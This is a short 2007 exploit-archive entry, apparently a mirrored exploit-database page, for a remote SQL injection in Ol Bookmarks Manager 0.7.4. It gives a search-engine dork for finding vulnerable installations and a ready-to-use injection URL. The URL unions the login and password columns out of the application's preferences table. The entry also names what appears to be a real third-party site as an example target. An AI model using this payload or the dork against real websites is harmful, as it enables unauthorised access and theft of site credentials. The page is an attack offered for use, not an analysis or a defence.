[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ol Bookmarks Manager 0.7.4 Remote SQL Injection Vulnerability
# Published : 2007-05-21
# Author : xoron
# Previous Title : TutorialCMS <= 1.01 Authentication Bypass Vulnerability
# Next Title : Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit


==========================================================================

Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities

==========================================================================

Found by: Cyber-Security

==========================================================================

D0rk : allintitle:ol'bookmarks

==========================================================================

Download: http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz

==========================================================================

/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*

Example: http://www.blex.co.uk/bookmarks

==========================================================================
thanx: ThE TiGeR couse he found RFI to this script:)
==========================================================================

# www.Syue.com [2007-05-21]